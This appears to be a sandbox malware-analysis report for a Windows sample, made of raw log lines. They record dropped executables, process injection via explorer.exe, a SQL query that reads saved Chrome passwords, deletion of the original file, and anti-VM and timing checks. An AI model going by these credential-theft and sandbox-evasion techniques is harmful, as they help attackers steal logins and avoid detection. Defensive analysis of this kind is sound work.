                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\69A9.exe C:\Users\user\AppData\Local\Temp\69A9.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\7795.exe C:\Users\user\AppData\Local\Temp\7795.exe
                Source: C:\Users\user\AppData\Local\Temp\6246.exeProcess created: C:\Users\user\AppData\Local\Temp\6246.exe C:\Users\user\AppData\Local\Temp\6246.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\837D.exe C:\Users\user\AppData\Local\Temp\837D.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\8C19.exe C:\Users\user\AppData\Local\Temp\8C19.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                Source: C:\Users\user\AppData\Local\Temp\7795.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 520
                Source: C:\Users\user\AppData\Local\Temp\837D.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2188 -s 520
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\idduhcf C:\Users\user\AppData\Roaming\idduhcf
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\4316.exe C:\Users\user\AppData\Local\Temp\4316.exe
                Source: C:\Users\user\AppData\Local\Temp\4316.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\6246.exe C:\Users\user\AppData\Local\Temp\6246.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\69A9.exe C:\Users\user\AppData\Local\Temp\69A9.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\7795.exe C:\Users\user\AppData\Local\Temp\7795.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\837D.exe C:\Users\user\AppData\Local\Temp\837D.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\8C19.exe C:\Users\user\AppData\Local\Temp\8C19.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\4316.exe C:\Users\user\AppData\Local\Temp\4316.exeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\6246.exeProcess created: C:\Users\user\AppData\Local\Temp\6246.exe C:\Users\user\AppData\Local\Temp\6246.exeJump to behavior
                Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\6246.tmpJump to behavior
                Source: 8C19.exe, 0000000A.00000003.503706148.0000000000665000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT origin_url,action_url,username_element,username_value,password_element,hex(password_value) password_value,submit_element,signon_realm,date_created,blacklisted_by_user,scheme,password_type,times_used,form_data,display_name,icon_url,federation_url,skip_zero_click,generation_upload_status,possible_username_pairs,id,date_last_used,moving_blocked_for FROM logins;
                Source: 8C19.exe, 0000000A.00000003.543193997.00000000023D1000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.566523088.00000000023D1000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.503664897.00000000023C9000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.503071576.00000000023B6000.00000004.00000020.00020000.00000000.sdmp, 6AB1.tmp.14.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008C6118 CreateToolhelp32Snapshot,Module32First,0_2_008C6118
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4132
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:916:120:WilError_01
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2188
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCommand line argument: msimg32.dll4_2_00404F07
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCommand line argument: VVdO4_2_00404F07
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCommand line argument: 0cA4_2_00416280
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\6246.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\6246.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\8C19.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\8C19.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: 6246.exe, 00000004.00000002.535198991.0000000002260000.00000040.00001000.00020000.00000000.sdmp, 6246.exe, 00000008.00000000.525988864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 6246.exe, 00000008.00000000.501708099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 6246.exe, 00000008.00000002.536320589.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                Source: Binary string: C:\zuluyoku\gidifi7\lijatimocoy\hucukudorozige sin\xuhuxepu.pdb source: file.exe, thduhcf.1.dr
                Source: Binary string: \C:\zuluyoku\gidifi7\lijatimocoy\hucukudorozige sin\xuhuxepu.pdb source: file.exe, thduhcf.1.dr
                Source: Binary string: C:\nowobuwelajiwu jivebap\wutamaki\havuzoruyudo.pdb source: 6246.exe, 6246.exe, 00000004.00000000.458480067.0000000000401000.00000020.00000001.01000000.00000006.sdmp, 6246.exe, 00000004.00000002.528799635.0000000000401000.00000020.00000001.01000000.00000006.sdmp, 6246.exe, 00000008.00000000.475624690.0000000000401000.00000020.00000001.01000000.00000006.sdmp, 6246.exe.1.dr
                Source: Binary string: C:\rajor100.pdb source: 69A9.exe, 00000006.00000000.462971903.0000000000401000.00000020.00000001.01000000.00000008.sdmp, idduhcf, 00000013.00000000.560081813.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, 69A9.exe.1.dr, idduhcf.1.dr
                Source: Binary string: M"C:\rajor100.pdb source: 69A9.exe, 00000006.00000000.462971903.0000000000401000.00000020.00000001.01000000.00000008.sdmp, idduhcf, 00000013.00000000.560081813.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, 69A9.exe.1.dr, idduhcf.1.dr
                Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: 6246.exe, 00000004.00000002.535198991.0000000002260000.00000040.00001000.00020000.00000000.sdmp, 6246.exe, 00000008.00000000.525988864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 6246.exe, 00000008.00000000.501708099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 6246.exe, 00000008.00000002.536320589.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                Source: Binary string: aa C:\nowobuwelajiwu jivebap\wutamaki\havuzoruyudo.pdb6K source: 6246.exe, 00000004.00000000.458480067.0000000000401000.00000020.00000001.01000000.00000006.sdmp, 6246.exe, 00000004.00000002.528799635.0000000000401000.00000020.00000001.01000000.00000006.sdmp, 6246.exe, 00000008.00000000.475624690.0000000000401000.00000020.00000001.01000000.00000006.sdmp, 6246.exe.1.dr
                Source: Binary string: C:\xifibezevatem\nebopo.pdb source: 7795.exe, 00000007.00000000.474481270.0000000000401000.00000020.00000001.01000000.00000009.sdmp, 837D.exe, 00000009.00000000.476307271.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 837D.exe.1.dr, 7795.exe.1.dr

                Data Obfuscation

                barindex
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
                Source: C:\Users\user\AppData\Roaming\thduhcfUnpacked PE file: 5.2.thduhcf.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
                Source: C:\Users\user\AppData\Local\Temp\69A9.exeUnpacked PE file: 6.2.69A9.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040EAFD push ecx; ret 0_2_0040EB10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040B3A3 push ecx; ret 0_2_0040B3B6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004097A4 push eax; ret 0_2_004097C2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008C7321 push cs; retf 0_2_008C734C
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: 4_2_004039AF push ecx; ret 4_2_004039B0
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: 4_2_0040EB0D push ecx; ret 4_2_0040EB20
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: 4_2_0040B3B3 push ecx; ret 4_2_0040B3C6
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: 4_2_004097B4 push eax; ret 4_2_004097D2
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: 4_2_009290AF push ecx; retf 4_2_009290B2
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: 4_2_004049EA LoadLibraryA,GetProcAddress,VirtualProtect,4_2_004049EA
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\idduhcfJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\thduhcfJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\6246.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\thduhcfJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\837D.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\7795.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\8C19.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\4316.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\7AF0.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\idduhcfJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\69A9.exeJump to dropped file

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\file.exeJump to behavior
                Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\thduhcf:Zone.Identifier read attributes | deleteJump to behavior
                Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\idduhcf:Zone.Identifier read attributes | deleteJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\6246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\6246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\6246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\6246.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Source: thduhcf, 00000005.00000002.575593576.0000000000862000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOKW
                Source: file.exe, 00000000.00000002.431534613.00000000008D2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOKZ
                Source: C:\Users\user\AppData\Local\Temp\8C19.exeRDTSC instruction interceptor: First address: 00000001405B10DA second address: 00000001405B10E3 instructions: 0x00000000 rdtsc 0x00000002 pop ebp 0x00000003 dec ecx 0x00000004 movzx eax, dx 0x00000007 cwd 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\thduhcfKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\thduhcfKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\thduhcfKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\thduhcfKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\thduhcfKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\thduhcfKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\69A9.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\69A9.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\69A9.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\69A9.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\69A9.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\69A9.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Windows\explorer.exe TID: 1380Thread sleep count: 650 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 1236Thread sleep count: 234 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 1248Thread sleep count: 181 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 3376Thread sleep count: 519 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 2880Thread sleep count: 104 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 1332Thread sleep count: 67 > 30Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\8C19.exe TID: 2004Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\8C19.exe TID: 4740Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exeLast function: Thread delayed
                Source: C:\Windows\explorer.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Local\Temp\8C19.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 650Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 519Jump to behavior
                Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7AF0.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: 4_2_0092771C rdtsc 4_2_0092771C
                Source: C:\Users\user\AppData\Local\Temp\8C19.exeThread delayed: delay time: 60000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\6246.exeCode function: 4_2_00404AE9 SetLastError,GetTickCount,GetLogicalDriveStringsW,LocalAlloc,UnregisterWait,GetNamedPipeHandleStateW,InterlockedIncrement,GetPrivateProfileStructA,GetConsoleAliasExesLengthW,EnumCalendarInfoA,EnumDateFormatsW,InterlockedCompareExchange,DeleteFiber,GetPrivateProfileStructA,LeaveCriticalSection,InterlockedExchange,RtlCaptureContext,FindResourceA,LocalFlags,OpenMutexA,GetStringTypeExA,GetComputerNameA,InitializeCriticalSection,LoadLibraryW,GetModuleHandleA,GetProcAddress,InterlockedDecrement,InterlockedDecrement,GetCurrentConsoleFont,GlobalFlags,FindNextVolumeA,GetConsoleFontSize,CreateJobObjectA,GetModuleHandleW,FormatMessageW,CreateActCtxA,GetConsoleTitleA,GetCalendarInfoA,VerifyVersionInfoW,FindFirstChangeNotificationA,InterlockedIncrement,InterlockedDecrement,GetCommandLineA,SearchPathA,WriteConsoleOutputA,GetProfileSectionA,MoveFileWithProgressA,GetCommandLineW,WriteConsoleA,lstrcpynW,CopyFileA,LoadLibraryA,MoveFileWithProgressW,CreateIoCompletionPort,GetOEMCP,InterlockedExchange,GetPrivateProfileStructA,DeleteVolumeMountPointA,GetConsoleAliasesLengthA,GetFileTime,GetStringTypeW,4_2_00404AE9
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\Jump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\Jump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\Jump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\Jump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\Jump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\Jump to behavior
                Source: explorer.exe, 00000001.00000000.380417254.0000000008631000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
                Source: explorer.exe, 00000001.00000000.387757323.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i
                Source: explorer.exe, 00000001.00000000.387757323.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                Source: explorer.exe, 00000001.00000000.370625735.00000000043B0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: 6246.exe, 00000008.00000002.538446381.0000000000858000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.537842924.000000000239E000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.533047658.000000000239E000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.537990582.00000000023B7000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.533523149.00000000023B7000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.535847326.000000000239E000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.535094361.00000000023BB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: explorer.exe, 00000001.00000000.387757323.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
                Source: 6246.exe, 00000008.00000002.537866043.0000000000807000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
                Source: explorer.exe, 00000001.00000000.380417254.0000000008631000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
                Source: 8C19.exe, 0000000A.00000003.537842924.000000000239E000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.533047658.000000000239E000.00000004.00000020.00020000.00000000.sdmp, 8C19.exe, 0000000A.00000003.535847326.000000000239E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW[{i4
                Source: 8C19.exe, 0000000A.00000003.522070249.00000000023C5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: explorer.exe, 00000001.00000000.421056906.00000000087F4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
